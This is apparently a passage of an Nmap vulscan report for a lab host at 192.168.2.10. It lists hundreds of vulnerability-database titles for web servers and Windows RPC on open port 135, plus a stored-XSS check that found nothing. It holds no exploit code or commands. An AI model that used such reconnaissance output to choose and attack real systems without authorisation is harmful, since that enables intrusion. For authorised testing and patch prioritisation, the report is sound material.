Module DoS [3843] phpWebSite Calendar Module Path Disclosure [3842] phpWebSite calendar Module day Parameter XSS [3803] Web Crossing Content-Length Header DoS [3793] Leif Wright Web Blog blog.cgi ViewFile Request file Parameter Arbitrary Command Execution [3778] Analog Form Interface Remote Arbitrary File Read [3749] DotNetNuke Web.config SQL Server Auth Credential Disclosure [3739] Leif Wright Web Blog Directory Traversal [3728] BEA WebLogic Boot Credentials Disclosure [3727] BEA WebLogic config.xml Cleartext Administrative Password Disclosure [3726] BEA WebLogic HTTP TRACE Response XSS [3725] BEA WebLogic ServerStartMBean.Password Password Disclosure [3724] BEA WebLogic Web Services Fat Client Incorrect Identity Privilege Escalation [3722] Novell NetWare Enterprise Web Server lcgitest.nlm Information Disclosure [3721] Novell NetWare Enterprise Web Server SnoopServlet Information Disclosure [3720] Novell NetWare Enterprise Web Server snoop.jsp Information Disclosure [3717] Perl on Novell NetWare Web Handler Crafted POST Request Arbitrary Perl Code Execution [3715] Novell NetWare Enterprise Web Server env.bas Information Disclosure [3714] Novell NetWare Enterprise Web Server CGI2PERL Module XSS [3707] Cherokee Web Server Error Page XSS [3695] Mbedthis AppWeb DOS Device Request Remote DoS [3694] GoAhead WebServer GET Request Traversal Arbitrary File Access [3680] WebTrends viewreport.pl profileid Variable Path Disclosure [3663] aldweb miniPortail lng Path Disclosure [3643] WebCalendar view_w.php eventinfo SQL Injection [3642] WebCalendar view_v.php eventinfo SQL Injection [3641] WebCalendar view_t.php eventinfo SQL Injection [3640] WebCalendar view_m.php eventinfo SQL Injection [3639] WebCalendar view_l.php eventinfo SQL Injection [3638] WebCalendar week_details.php eventinfo SQL Injection [3637] WebCalendar month.php eventinfo SQL Injection [3636] WebCalendar day.php eventinfo SQL Injection [3635] WebCalendar colors.php color SQL Injection [3634] WebCalendar week.php user SQL Injection [3633] WebCalendar week.php user XSS [3632] WebCalendar colors.php color XSS [3631] WebCalendar view_w.php eventinfo XSS [3630] WebCalendar view_v.php eventinfo XSS [3629] WebCalendar view_t.php eventinfo XSS [3627] WebCalendar view_m.php eventinfo XSS [3625] WebCalendar view_l.php eventinfo XSS [3624] WebCalendar week_details.php eventinfo XSS [3623] WebCalendar month.php eventinfo XSS [3617] GoAhead WebServer Malformed Content-Length Header Remote DoS [3610] GetWare Multiple Products Integrated WebServer Malformed Content-Length DoS [3559] RealNetworks Helix Administrative Interface HTTP POST Request DoS [3550] WebScripts WebBBS Guestbook XSS [3549] WebBBS Pro DOS Device Name DoS [3548] International TeleCommunications WebBBS New User Overflow [3547] International TeleCommunications WebBBS Search DoS [3546] Extropia WebBBS bbs_forum.cgi read Parameter Traversal Remote Command Execution [3545] International TeleCommunications WebBBS File Name Overflow [3544] International TeleCommunications WebBBS GET Request Overflow [3543] WebScripts WebBBS Message SSI [3542] WebScripts WebBBS Unspecified Delete Function [3541] WebScripts WebBBS Unspecified Potential Delete Function [3540] WebScripts WebBBS Unspecified delete message Profile-based [3513] WebScripts WebBBS webbbs_config.pl Remote Command Execution [3494] SurfControl SuperScout Web Filter SQL Injection [3493] SurfControl SuperScout Web Filter Arbitrary File Access [3492] SurfControl SuperScout Web Filter GET Request DoS [3491] SurfControl SuperScout Web Filter Weak Encryption [3489] SurfControl SuperScout Web Filter User Accounts Information Disclosure [3473] PhpGedView gdbi_interface.php pid Parameter XSS [3459] Symantec Web Security Error Page XSS [3445] DansGuardian Webmin Module edit.cgi Arbitrary File Access [3427] Sun ONE Web Server on HP-UX Unspecified Overflow [3426] BEA WebLogic JVM DoS [3425] BEA WebLogic Password Exposure Weakness [3417] BEA WebLogic InteractiveQuery.jsp XSS [3416] Novell GroupWise GWWEB.EXE HELP Web Server Path Disclosure [3415] Novell GroupWise GWWEB.EXE/GWINTER.NLM Overflow [3414] Novell GroupWise GWWEB.EXE HTMLVER Web Server Path Disclosure [3413] Novell GroupWise GWWEB.EXE HELP Parameter Traversal Arbitrary File Access [3375] Abyss Web Server Administration Console Authentication Bypass [3359] Easy File Sharing Web Server Forum Malformed Title Field DoS [3358] Easy File Sharing Web Server users.sdb Local Cleartext Password Disclosure [3355] Easy File Sharing Web Server msg.ghp Multiple Parameter Traversal Arbitrary File Access [3352] Easy File Sharing Web Server Traversal Arbitrary File / Directory Access [3306] Cherokee Web Server Malformed POST Request Remote DoS [3304] miniBB bb_func_usernfo.php Website Name Field XSS [3296] Fortinet FortiOS (FortiGate) Firewall selector Admin Interface XSS [3295] Fortinet FortiOS (FortiGate) Firewall listdel Admin Interface XSS [3294] Fortinet FortiOS (FortiGate) Firewall Policy Admin Interface XSS [3289] Fortinet FortiOS (FortiGate) Firewall dlg Admin Interface XSS [3288] Abyss Web Server Multiple slash Arbitrary Directory Listing [3287] Abyss Web Server Crafted Filename Request Authentication Bypass [3286] Abyss Web Server Character Append Arbitrary File Disclosure [3285] Abyss Web Server Traversal Arbitrary File Access [3281] MaxWebPortal search.asp Search Parameter XSS [3243] CA Unicenter RC Help Interface Privilege Escalation [3235] iPlanet Web Publisher Remote Overflow [3233] Multiple Web Server Default Page Fingerprinting Weakness [3214] Active Webcam Traversal Arbitrary File Access [3138] Active WebCam Error Page XSS [3093] Potentially Dangerous Web Document Found [3092] Interesting Web Document Found [3088] Web Art Factory CMS Unspecified User Authentication [3083] SAP DB Web Agent Administration Unauthorized access [3082] SAP DB Web-Tools &quot [3080] SAP DB niserver Interface Overflow [3078] Cisco PIX VPNC External Interface IKE Phase 1 Packet Remote DoS [3064] BEA WebLogic MBeanHome Config Information Disclosure [3063] BEA WebLogic Node Manager DoS [3062] BEA WebLogic JMS Provider Cleartext Password [3061] BEA WebLogic T3S Protocol Information Disclosure [3051] Microsoft IE MHT Web Archive Overflow [3049] Microsoft IE ftp.htt FTP Web View URL XSS [3035] Microsoft WebBrowser Control t:video File Execution [3020] Cyclonic WebMail Email Spoofing [3005] Microsoft IE WebBrowser Control dialogArguments XSS [2946] Web Wiz Forums forum_members.asp XSS [2936] phpWebFileManager Invalid Extension File Manipulation [2926] Abyss Web Server Directory Protection Bypass [2922] Webgate Web Eye Exposure of Users and Passwords [2901] Websense Blocked Site XSS [2899] GnuPG HTTP Keyserver Protocol Interface Format String [2891] Sun ONE Web Server Unspecified DoS [2876] Macromedia JRun JMC Interface XSS [2833] SAP DB Web Database Manager Predictable Session IDs [2831] Sun ONE Web Server Log Entry Manipulation [2830] NetServe Web Server Directory Traversal and Admin Password Disclosure [2829] phpWebFileManager index.php f Parameter Traversal Arbitrary File Access [2814] WebWasher Proxy Port Error Message XSS [2813] Web Wiz Forums XSS [2810] BEA WebLogic Proxy Plugin DoS [2793] TelCondex tc.SimpleWebServer Directory Traversal [2768] Web Wiz Forums Unauthorized Message Access [2764] Plug and Play Web Server Proxy Service HTTP Request Handling DoS [2757] IA WebMail Server GET Request Overflow [2747] Compaq Insight Manager Web Agent Unspecified DoS [2738] Simple Web Server (SWS) Referer Header Overflow [2732] Fastream NETFile FTP/WebServer 404 Error Page XSS [2723] FirstClass /Search Web Root Remote Information Disclosure [2719] WebTide Encoded JSP File HTTP Request Arbitrary Directory Access [2689] Bajie HTTP Web Server Multiple XSS [2679] Microsoft Outlook Web Access XSS [2653] Alt-N WebAdmin WebAdmin.dll Overflow [2632] MPWeb PRO Arbitrary File Access [2619] webfs Arbitrary File and Directory Access [2610] Savant Web Server Infinite Loop DoS [2604] BRS WebWeaver IP Logging Bypass [2597] EnGarde WebTool-userpass Exposes Passwords [2554] Forum Web Server Login Bypass [2552] Easy File Sharing Web Server newmsg.ghp Your Message Field XSS [2549] Bandwebsite admin.php Direct Request Arbitrary Account Creation [2542] 4D WebSTAR FTP Password Parameter Remote Overflow [2531] WebX Arbitrary File Access [2521] ICQ Web Front XSS [2512] WebCalendar day.php eventinfo XSS [2496] Web Wiz Journal Database Content Disclosure [2494] Web Wiz Internet Search Engine Database Content [2493] Web Wiz Polls Database Content Disclosure [2492] Web Wiz Guestbook WWGguestbook.mdb Direct Request Database Disclosure [2491] Web Wiz Mailing Database Content Disclosure [2484] BEA WebLogic Integration - Business Connect Access to [2481] aldweb miniPortail lng Parameter XSS [2465] DWebPro http.ini Cleartext Authentication Credential Disclosure [2457] oMail-webmail omail.pl checklogin Function Multiple Field Arbitrary Command Execution [2444] WebFtp accounts.dat Authentication Credential Cleartext Disclosure [2433] WebiToome WebiToome_Prefs Account Credential Cleartext Disclosure [2425] Sun ONE Web Server Unspecified DoS [2410] phpWebSite Multiple Calendar Module SQL Injection [2401] Webware for Python Cookie Object Arbitrary Code Execution [2391] SkunkWEB Cache.py Arbitrary File Access [2372] bj Http Web Server config/users.properties Authentication Credential Cleartext Disclosure [2345] BEA WebLogic Server JNDI Initial Contexts Privilege Escalation [2310] Novell NetWare Web Server CGI2PERL.NLM PERL Handler Remote Overflow [2234] VisNetic WebSite Path Disclosure [2226] Abyss Web Server Malformed GET Header Remote DoS [2207] Alt-N WebAdmin USER Remote Overflow [2201] iWeb Server Directory Transversal [2195] VisNetic WebMail PHP Source Disclosure [2194] Armida Databased Web Server 1.0 DoS [2164] Plug and Play Web Server Arbitrary File/Directory Access [2125] BEA WebLogic/Liquid Data XSS [2117] Multiple Web Server Default Welcome Page Fingerprinting Weakness [2110] Web Server Name Disclosure [2100] Microsoft Windows RPC DCOM Interface Overflow [2096] Microsoft ISA Server SurfControl Web Filter [2092] IBM WebSphere HTTP Request Header Remote Overflow [2091] NucaWeb Server Arbitrary File Access [2090] IBM WebSphere Caching Proxy DoS [2089] IBM Tivoli SecureWay WebSEAL Proxy Policy Director Encoded URL DoS [2087] Mountain Network Systems webcart.cgi NEXTPAGE Parameter Arbitrary Command Execution [2020] Cacheflow CacheOS Web Administration Arbitrary Cached Page Code Leakage [1979] IBM Lotus Domino Web Server webadmin.ntf ReplicaID Request Web Administrator Access [1921] Roxen Web Server URL Rectifier Module Arbitrary File Access [1908] IBM Tivoli SecureWay WebSEAL Proxy Policy Director Encoded Traversal Arbitrary File Access [1848] Cisco CSS Web Management Authentication Bypass [1844] Webmin miniserv.pl Environment Variable Cleartext Password Local Disclosure [1817] Jana Web Server MS-DOS Device Name Request Parsing Remote DoS [1807] SAP Web Application Server for Linux Arbitrary Command Execution [1802] Perl Web Server Arbitrary File Read [1799] WebXQ Server Arbitrary File Access [1798] Viking Web Server Traversal Arbitrary File Access [1789] Microsoft ISA Server Web Proxy Malformed HTTP Request Parsing Remote DoS [1775] O'Reilly Website Professional Malformed Request Path Disclosure [1770] Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS [1724] Microsoft Web Client Extender NTLM Credential Disclosure [1707] NetScreen Firewall WebUI URL Handling Remote Overflow DoS [1706] IBM HTTP Server AfpaCache/WebSphereNet.Data user-agent Header Handling Remote DoS [1657] 602Pro LAN SUITE webprox.dll GET Request Overflow [1649] PeleSoft NetSnap Web Server GET Request Overflow [1626] Samba Web Administration Tool (SWAT) cgi.log Permission Weakness Information Disclosure [1625] Samba Web Administration Tool (SWAT) Failed Login Logging Failure Weakness [1619] 4D WebSTAR GET Overflow DoS [1606] Microsoft IE Cached Web Credentials Disclosure [1561] IBM WebSphere Application Server (WAS) Host: Request Header Overflow [1553] Microsoft WebTV annclist.exe Malformed UDP Packet Parsing Remote DoS [1541] Gordano NTMail Web Configuration Server Partial HTTP Request DoS [1509] BEA WebLogic Proxy Multiple Overflows [1483] BEA WebLogic JSPServlet Remote Code Execution [1481] BEA WebLogic FileServlet Source Code Disclosure [1480] BEA WebLogic SSIServlet Invocation Source Code Disclosure [1474] IBM WebSphere InvokerServlet Source Code Disclosure [1470] L-Soft LISTSERV Web Archives Long QUERY_STRING Overflow [1463] WEBactive HTTP Server GET Request Overflow [1456] Savant Web Server GET Request Remote Overflow [1443] Oracle Web Listener for AIX Malformed URL DoS [1442] LocalWEB HTTP Long Get Request Parsing Remote Overflow DoS [1423] Netwin DMailWeb / CWMail Server POP Trust DoS [1422] Netwin DMailWeb / CWMail Malformed Username Arbitrary Mail Relay [1414] BEA WebLogic Server/Express file Servlet Source Code Disclosure [1397] Selena Sol WebBanner Traversal Arbitrary File Access [1391] IBM WebSphere Upper Case JSP Request Source Code Disclosure [1350] HP Web JetAdmin wja Traversal Arbitrary File Access [1327] Gordano NTMail Web Configuration Server Request Proxy Restriction Bypass [1311] L-Soft LISTSERV Web Archives Buffer Overflow [1273] SalesLogix eViewer slxweb.dll Request Remote DoS [1264] Netscape Enterprise Server Web Publishing Directory Listing [1249] StarOffice StarScheduler Web Server Traversal Arbitrary File Access [1248] StarOffice StarScheduler Web Server GET Request Overflow [1211] Rightfax Webclient Predictable Session Number Hijack [1210] Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access [1203] Multiple BSD /proc File Sytem mem Interface Modification Privilege Escalation [1191] Allaire Spectra Webtop Explicit URL Authentication Bypass [1177] Savant Web Server GET Request NULL Character Handling Remote DoS [1174] WebWho+ whois.pl type Parameter Arbitrary Command Execution [1152] Microsoft IE Web Proxy Auto-Discovery Unauthorized Proxy Reconfiguration [1127] Falcon Web Server Arbitrary File Access [1126] Zeus Technologies Zeus Web Server Arbitrary File Retrieval [1125] Squid Web Proxy Newline Cross-User Authentication Bypass [1067] Bluestone Sapphire Web Server Predictable Session ID Hijacking [959] SmartDesk WebSuite Long URL Overflow [902] Webmin Password Brute Force Weakness [877] Multiple Web Server Dangerous HTTP Method TRACE [846] iPlanet/One Web Server search Arbitrary File Access [829] IBM WebSphere Application Server (WAS) Java Servlet Error Page XSS [825] LocalWEB2000 Directory Traversal Arbitrary File Access [819] Macromedia JRun Web Server (JWS) GET Request Traversal Arbitrary File Access [787] Compaq Web-enabled Management Software HTTP Server Arbitrary Traffic Proxy [786] Cabletron WebView Information Disclosure [722] Novell GroupWise Web Access Path Disclosure [706] Oracle Internet Application Server (IAS) WebDB/Portal Component mod_plsql Request DAD File Disclosure [682] Webalizer DNS Lookup Host Name XSS [675] Oracle Application Server Web Cache Null Character Request Remote DoS [672] IBM Informix Web Datablade ifx Module Traversal Arbitrary File/Directory Access [668] Horde IMP Webmail status.php3 message Parameter XSS [659] Novell GroupWise webacc Malformed User Path Disclosure [646] WebDiscount eshop.pl seite Parameter Arbitrary Command Execution [644] Apple Mac OS X Find-By-Content .FBCIndex Web File Content Disclosure [640] Textor Webmasters Ltd listrec.pl TEMPLATE Variable Arbitrary Command Execution [617] VisualRoute Web Server Arbitrary Host Traceroute [616] Tripwire for Web Pages Installation Disclosure [613] SiteScope Web Management Server SiteScope.html Information Disclosure [610] Oracle Applications One-Hour Install Web Server Unauthenticated Configuration Modification [603] SIX-webboard generate.cgi content Parameter Traveral Arbitrary File Access [589] Sambar Web Server pagecount CGI Traversal Arbitrary File Overwrite [576] BEA WebLogic Encoded Request Forced Directory Listing [575] Tarantella Enterprise ttawebtop.cgi pg Parameter Traversal Arbitrary File Access [571] Netscape Enterprise Web Publishing INDEX Command Arbitrary Directory Listing [561] Apache Web Servers mod_status /server-status Information Disclosure [560] Check Point FireWall-1 Web Server Account Name Disclosure [525] Microsoft IIS Webserver Invalid Filename Request Arbitrary Command Execution [517] Savant Web Server Malformed GET Request CGI Source Disclosure [514] Pi3Web tstisap.dll URL Handling Remote Overflow [512] WebSPIRS webspirs.cgi sp.nextform Parameter Traversal Arbitrary File Access [510] W3.org Anaya Web sendtemp.pl templ Variable Traveral Arbitrary File Access [507] PALS Library System WebPALS pals-cgi Traversal Arbitrary File Read [502] HSWeb HTTP Server /cgi/ Directory Request Path Disclosure [500] Allaire JRun Crafted Request WEB-INF Forced Directory Listing [498] iWeb Hyperseek 2000 hsx.cgi show Parameter Traversal Arbitrary File Access [497] Basilix Webmail .class / .inc Direct Request Remote Information Disclosure [489] IBM Informix webdriver CGI Unauthenticated Database Access [487] Samba Web Administration Tool (SWAT) Error Message Username Enumeration [465] MailMan Webmail mmstdod.cgi ALTERNATE_TEMPLATES Parameter Arbitrary Command Execution [456] NAI WebShield SMTP Malformed From: Header Remote DoS [437] iPlanet Web Server SHTML Logging Filename Remote Overflow [432] Bytes Interactive Web Shopper shopper.cgi Traversal Arbitrary File Access [431] eXtropia Web Store web_store.cgi Traversal Arbitrary File Access [426] Boa Web Server Traversal Arbitrary File Access/Execution [425] Microsoft IIS WebDAV SEARCH Method Arbitrary Directory Forced Listing [420] Extent RBS Web Server Image Parameter Traversal Arbitrary File Access [406] Sun Java Web Server bboard Servlet Command Execution [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing [397] Multiple Web Server Dangerous HTTP Method PUT [392] Simple Web Counter swc ctr Parameter Remote Overflow [383] Multiple Web Server UserDir 'nobody' Request Arbitrary File Access [378] Roxen Web Server /%00/ Encoded Request Forced Directory Listing [375] O'Reilly WebSite Pro GET Request Remote Overflow [374] O'Reilly WebSite Pro webfind.exe keywords Parameter Remote Overflow [369] WebActive HTTP Server active.log Remote Information Disclosure [364] CVSWeb cvsweb.cgi Shell Metacharacter Arbitrary Command Execution [337] Imate Webmail Server HELO Command Remote Overflow [327] NAI WebShield SMTP SET_CONFIG Overflow [326] NAI WebShield SMTP GET_CONFIG Information Disclosure [322] NAI Gauntlet / WebShield CyberPatrol Content Monitoring System Remote Overflow [294] Cart32 c32web.exe CGI Component Admin Password Manipulation [280] talentsoft Web+ webplus CGI script Parameter Traversal Arbitrary File Access [271] Microsoft IIS WebHits null.htw .asp Source Disclosure [264] Oracle Web Listener /ows-bin/ Directory Arbitrary Command Execution [254] Zeus Technologies Zeus Web Server Null Byte Request CGI Source Disclosure [240] Progress WebSpeed Messenger Administration Utility Unauthenticed Access [239] WebSite Pro Malformed URL Path Disclosure [238] Web Server robots.txt Information Disclosure [237] WebGais websendmail CGI Arbitrary Command Execution [236] WebGais webgais CGI Arbitrary Command Execution [235] IRIX webdist.cgi distloc Parameter Arbitrary Command Execution [234] Webcart Default Install Configuration Disclosure [229] O'Reilly WebSite uploader.exe Arbitrary File Upload [215] Samba Web Administration Tool (SWAT) cgi.log Symlink Arbitrary File Modification [200] Multiple Web Server CGI Directory Command Interpretor [155] Roxen Web Server Counter Module CPU Consumption DoS [113] Tektronix PhaserLink Printer Web Server Direct Request Administrator Access [111] Microsoft Personal Web Server Multiple Dot Request Arbitrary File Access [91] Web Server Version Disclosure [62] Multiple Web Server finger CGI Information Disclosure [55] Excite for Web Server architext_query.pl Shell Metacharacter Arbitrary Command Execution [49] IBM Lotus Domino Web Server ?open Forced Directory Listing [31] CERN httpd Virtual Web Path Disclosure [12] Alibaba Web Server HTTP Request Overflow DoS [10] Alibaba Web Server Traversal Arbitrary File Access [8] O'Reilly WebSite win-c-sample Remote Overflow
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.

Misc Metrics (click to expand)

192.168.2.10(online)

Address

192.168.2.10 (ipv4)
00:0C:29:D6:AB:A4 - VMware (mac)

Ports

The 997 ports scanned but not shown below are in state: closed

997 ports replied with: reset

Port		State (toggle closed [0] \| filtered [0])	Service	Reason	Product	Version	Extra info
135	tcp	open	msrpc	syn-ack	Microsoft Windows RPC
	vulscan	VulDB - https://vuldb.com: [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [88280] Microsoft Windows DCE/RPC information disclosure [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [54547] Microsoft Windows grpconv.exe memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE privilege escalation [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4181] Microsoft Windows RPC Processor privilege escalation [3370] Microsoft Windows RPC Authentication denial of service [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2310] Microsoft Windows 2000 RPC weak authentication [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [900] Microsoft Windows grpconv.exe memory corruption [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [331] Microsoft Windows 2000/XP RPCSS race condition [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call 